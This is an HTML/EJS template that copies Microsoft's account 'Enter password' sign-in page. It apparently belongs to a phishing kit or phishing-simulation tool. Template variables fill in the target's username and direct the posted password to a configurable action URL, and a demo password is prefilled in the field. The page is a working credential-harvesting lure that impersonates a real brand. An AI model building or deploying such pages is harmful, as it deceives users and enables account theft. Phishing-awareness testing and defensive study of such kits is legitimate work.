<!DOCTYPE html>
<html dir="ltr" class="" lang="en">

<head>
  <title>Sign in to your account</title>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes" />
  <meta http-equiv="Pragma" content="no-cache" />
  <meta http-equiv="Expires" content="-1" />
  <link rel="shortcut icon" href="/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico" />
  <meta name="robots" content="none" />
  <link href="/content/cdnbundles/converged.v2.login.min_k6vcupdeent1wwpsw5wt2g2.css" rel="stylesheet" />
</head>

<body class="cb" style="display: block;">
  <div>
    <div>
      <div class="background" role="presentation">
        <div class="backgroundImage"
          style='background-image: url("/content/images/martyna-bober-i7KmqGOapf0-unsplash.jpg");'></div>
        <div class="background-overlay"></div>
      </div>
    </div>
    <form name="f1" id="i0281" novalidate="novalidate" spellcheck="false" method="post" target="_top" autocomplete="off"
      action="<%= actionUrl %>">
      <div class="outer">
        <div id="msccBanner" class="cc-banner" role="alert">
          <div class="cc-container">
            <img class="cc-icon cc-v-center" role="presentation"
              pngsrc="/content/images/info_f80c92602db0428ef47b2bb71ea236b4.png"
              svgsrc="/content/images/info_4883eb1a3cbdddf5a79e28d320cfe5a9.svg"
              src="/content/images/info_4883eb1a3cbdddf5a79e28d320cfe5a9.svg" />
            <span class="cc-v-center cc-text">This site uses cookies for analytics, personalized content and
              ads.&nbsp;By continuing to browse this site, you agree to this
              use.
              <a href="https://privacy.microsoft.com/en-US/privacystatement" id="msccLearnMore"
                aria-label="Learn more about Microsoft's Cookie Policy" class="cc-link cc-v-center float-right">Learn
                more</a></span>
          </div>
        </div>
        <div class="middle">
          <div class="inner fade-in-lightbox">
            <div class="lightbox-cover"></div>
            <div>
              <img class="banner-logo" role="presentation" src="/content/images/bannerlogo?ts=637045224907731827" />
            </div>
            <div role="main">
              <div class="">
                <div class="animate slide-in-next">
                  <div>
                    <div class="identityBanner">
                      <div id="displayName" class="identity" title="<%= username %>">
                        <%= username %>
                      </div>
                    </div>
                  </div>
                </div>
                <div class="pagination-view has-identity-banner animate slide-in-next">
                  <div>
                    <input type="hidden" name="login" value="<%= username %>" />
                    <div id="loginHeader" class="row text-title" role="heading" aria-level="1">
                      Enter password
                    </div>
                    <div class="row">
                      <div class="form-group col-md-24">
                        <%if (error) { %>
                        <div role="alert" aria-live="assertive">
                          <div id="passwordError" class="alert alert-error">
                            <%= error %>
                          </div>
                        </div>
                        <% } %>
                        <div class="placeholderContainer">
                          <input name="passwd" type="password" id="i0118" autocomplete="off" class="form-control"
                            aria-required="true" aria-describedby="loginHeader  " placeholder="Password"
                            aria-label="Enter the password for<% username %> tabindex=" 0" value="demo123$!" />
                        </div>

                      </div>
                    </div>
                    <div>
                      <div class="row move-buttons">
                        <div>
                          <div class="col-xs-24 no-padding-left-right button-container">
                            <div class="inline-block">
                              <!-- type="submit" is needed in-addition to 'type' in primaryButtonAttributes observable to support IE8 -->
                              <input type="submit" id="idSIButton9" class="btn btn-block btn-primary" value="Sign in" />
                            </div>
                          </div>
                        </div>
                      </div>
                    </div>
                    <div id="idBoilerPlateText" class="wrap-content boilerplate-text">
                      <%= client_id %>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
        <div id="footer" class="footer default" role="contentinfo">
          <div>
            <div id="footerLinks" class="footerNode text-secondary">
              <a id="ftrTerms" href="https://www.microsoft.com/en-US/servicesagreement/">Terms of use</a>
              <a id="ftrPrivacy" href="https://privacy.microsoft.com/en-US/privacystatement">Privacy &amp; cookies</a>
              <a id="moreOptions" href="#" role="button" class="moreOptions"
                aria-label="Click here for troubleshooting information" aria-expanded="false">
                <img class="desktopMode" role="presentation"
                  pngsrc="/content/images/ellipsis_white_0ad43084800fd8b50a2576b5173746fe.png"
                  svgsrc="/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b588ad73.svg"
                  src="/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b588ad73.svg" /><img class="mobileMode"
                  role="presentation" pngsrc="/content/images/ellipsis_grey_5bc252567ef56db648207d9c36a9d004.png"
                  svgsrc="/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg"
                  src="/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg" />
              </a>
            </div>
          </div>
        </div>
      </div>
    </form>
  </div>
</body>

</html>
